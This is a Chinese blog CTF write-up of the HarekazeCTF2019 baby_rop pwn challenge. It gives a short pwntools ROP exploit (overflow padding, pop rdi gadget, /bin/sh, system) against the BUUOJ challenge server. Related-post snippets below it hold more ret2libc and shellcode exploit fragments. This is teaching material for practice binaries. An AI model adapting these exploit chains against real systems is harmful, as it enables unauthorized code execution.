rop

最新推荐文章于 2024-11-01 17:59:01 发布
原创 最新推荐文章于 2024-11-01 17:59:01 发布 · 232 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[HarekazeCTF2019]baby_rop

ida
main函数

在这里插入图片描述
system地址
在这里插入图片描述

并且发现有/bin/sh

在这里插入图片描述

exp:

from pwn import *
p=remote('node3.buuoj.cn',29598)
binsh_addr = 0x0000000000601048
sys_addr = 0x0000000000400490
pop_rdi = 0x400683
payload = 'a'*(0x10+8) + p64(pop_rdi) + p64(binsh_addr) + p64(sys_addr) 
p.sendline(payload)
p.interactive()
p.interactive()
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7953
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
针对Android上的ROP攻击剖析
热门推荐
简行之旅
11-01 1万+
引言        ROP(Return-oriented programming),即“返回导向编程技术”。其核心思想是在整个进程空间内现存的函数中寻找适合指令片断(gadget),并通过精心设计返回堆栈把各个gadget拼接起来,从而达到恶意攻击的目的。构造ROP攻击的难点在于,我们需要在整个进程空间中搜索我们需要的gadgets,这需要花费相当长的时间。但一旦完成了“搜索”和“拼接”,这样
[rop简单讲解 和基本rop使用]
最新发布
GUANGUANMAO1的博客
11-01 2748
参考大佬文章 自我学习笔记 方便查看。
ROP攻击技术
guilanl的专栏
03-14 5152
原文地址: http://blog.csdn.net/linyt/article/details/48738757 背景 前面介绍了ret2libc和ret2plt,这两个攻击技术的相通点是函数参数是通过压栈来传递,这也是i386架构的调用约定。然而随着64位服务器的普及,以及后来越来越广泛,以致几乎所有服务器都升级到64位的硬件上。 x86
缓冲区溢出 - ROP 基础
weixin_46099552的博客
10-28 1359
ROP基础
checksec
Trick的博客
11-10 3743
checksec checksec到底是用来干什么的? 它是用来检查可执行文件属性,例如PIE, RELRO, PaX, Canaries, ASLR, Fortify Source等等属性。 我们在ubuntu下使用它时,会显示有5行信息: 1.Arch 从这行信息可以知道程序是32bit还是64bit的 2.RELRO 3.Stack 显示Stack:No canary found则表示可以利用栈溢出 编译时控制是否开启栈保护以及程度: gcc -fno-stack-protector -o test
Pwn_CTFShow_01
Trick的博客
11-08 1126
Pwn_CTFShow1.PWN签到题2.pwn02 1.PWN签到题 直接 nc 出flag,白给 2.pwn02 file 一下 32bit IDA分析 发现 bin/sh 地址 可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移 cyclic -l 0x...... exp: from pwn import * #p=process('') p=remote('111.231.70.44',28042) paylode='a'*13 + p32(0x8048518)
Pwn_BUUCTF
Trick的博客
11-08 1095
Pwn_BUUCTF1.test_your_nc2.ripIDA查看写脚本 1.test_your_nc 直接 nc cat flag 直接出flag,白给题 2.rip IDA查看 拉文件进 IDA 看main: 直接进 gets 找 s 发现偏移:0xF + 8 写exp paylode=a*(0xF+8) 回到 IDA 看到 “/bin/sh” 的地址 :40118A 写脚本 完整exp from pwn import * p=remote('node3.buuoj
not_the_same_3dsctf_2016
Trick的博客
11-26 917
IDA main函数发现栈溢出 长度2d 在函数列表找到 get_secret()函数 知道flag被存在了bss段上的fl4g中 一开始的想法是用main函数的printf把flag输出,但发现好像行不通 后来在列表中找到了write函数 函数地址可以用elf.sym[‘write’]表示,也可以直接用test段的地址,都一样 exp: from pwn import * context.log_level='debug' p = remote('node3.buuoj.cn',29167) e
Pwn_CTFShow_02
Trick的博客
11-08 808
Pwn_CTFShow_0101栈溢出之ret2text 01栈溢出之ret2text 很简单的一个栈溢出 直接IDA分析 从main函数跟进到welcome函数 get() 很明显的溢出 payload = 'a'*(0x80+8) 因为是64位的,所以后面要加上8 Shift+F12 发现/bin/sh 果然够简单的。。。 双击进去 再双击 找到地址 exp: from pwn import * p=remote('111.231.70.44',28072) payload='a'*(0
Pwn_0xGame_01
Trick的博客
11-08 730
Pwn_0xGame1.欢迎来到0xGame平台2.帮我取一个题目名称ret2text3.easy_stack4.该怎么起名呢shellcode5.variable_coverage变量覆盖 1.欢迎来到0xGame平台 nc出flag 2.帮我取一个题目名称 ret2text 打开IDA分析 main函数 跟进 第二个函数 s栈大小为20h=32 函数最后return read了s 所以很好写了 因为是64位程序,后面再加上8个字符 payload = 'a' * (0x20+8) Shift+F1
one_gadget
Trick的博客
11-27 666
[BJDCTF 2nd]one_gadget ida看main函数 再看init函数 会输出一个printf的地址 使用one_gadget,计算一下libc的基址 buuctf给了远程的libc文件,下载下来 one_gadget [libcfilename] exp: from pwn import * context.log_level='debug' p=remote('node3.buuoj.cn',25812) libc=ELF('./libc-2.29.so') p.recvunt
整形溢出
Trick的博客
11-23 660
[BJDCTF 2nd]r2t3 来自buuctf 先看ida buf缓冲区大小为408h,而read读取大小为400h,比buf要小,所以不能进行简单的缓冲区栈溢出。 再看name_check函数,v3是int8类型的变量,1111 1111 = 0xFF = 255。当0xFF +1的时侯,变量发生整形溢出,0x100 = 256 此时v3的数值为零(0000 0000),但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作变成 1 0000 0000。 同时还要满足3< v3
Pwn_0xGame_02
Trick的博客
11-08 582
Pwn_0xGame_021.Pwn题滞销,帮帮我好吗?syscall 1.Pwn题滞销,帮帮我好吗? syscall IDA打开 发现是个syscall的题目 直接去看这个函数的汇编 根据师傅们所说,我们需要让rax存入59,让syscall去调用execve函数 (ret2syscall?) syscall_64 GitHub查询 之后要构造出来 execve("/bin/sh",0,0) 拿取权限 找"/bin/sh"字符串 方法一: 在程序中有,找到它 从’[‘数起到斜杠前面的空格’ ',再
Pwn_buuctf_ciscn_2019_c_1
Trick的博客
11-20 539
libc64 ida查看 在main函数没有发现明显漏洞 跟进encrypt()函数 发现了gets()和puts()函数,可以利用gets的栈溢出泄漏出puts的地址,从而找到libc版本信息getshell exp: from pwn import * from LibcSearcher import * p= remote('node3.buuoj.cn',25412) #p= remote('127.0.0.1',12345) #p = process('./ciscn_2019_c_1') #
湖湘杯hxb_pwn
Trick的博客
11-08 268
湖湘杯hxb_pwn pwn_printf pwn_libc ida 16次循环 下面if判断v12<=0x20 所以写 for i in range(16): n.sendline("32") 跟进if下面的函数 这里变量的栈是空栈0h,所以offset只需要64bit程序的8个就行。 再然后a * a1,所以传参需要double 0x20,也就是0x40 ROPgadget --binary pwn_printf 找到pop_rdi_ret的地址 复习一下libc64_payload公式
get_started_3dsctf_2016
Trick的博客
11-24 252
先看ida 发现get_flag函数需要a1和a2两个参数等于特定值就可以读到flag 可以利用main中的栈溢出进行传参 32位程序payload = offset + 函数地址 + 返回地址 + 参数 返回地址我们利用程序中的exit: exp: from pwn import * p = remote('node3.buuoj.cn',29726) context.log_level = 'debug' sleep(0.1) get_flag = 0x080489A0 exit_addr = 0x
Jarvis
Trick的博客
12-18 241
level5 exp: from pwn import * #context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c'] #p = process('./level3_x64') p = remote('pwn2.jarvisoj.com','9884') #p = remote('127.0.0.1',12345) libc=ELF('./libc-2.19.so') elf=ELF('./level3_x64') context.log_level=
libc_demo
Trick的博客
11-14 193
32bit from pwn import * context.log_level = 'debug' elf = ELF('./pwn') #产生一个对象 p = remote('xxx.xxx.xxx.xxx',xxxx) puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main_addr = elf.symbols['main'] #elf.symbols['a_function'] 找到 a_function 的地址 pa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值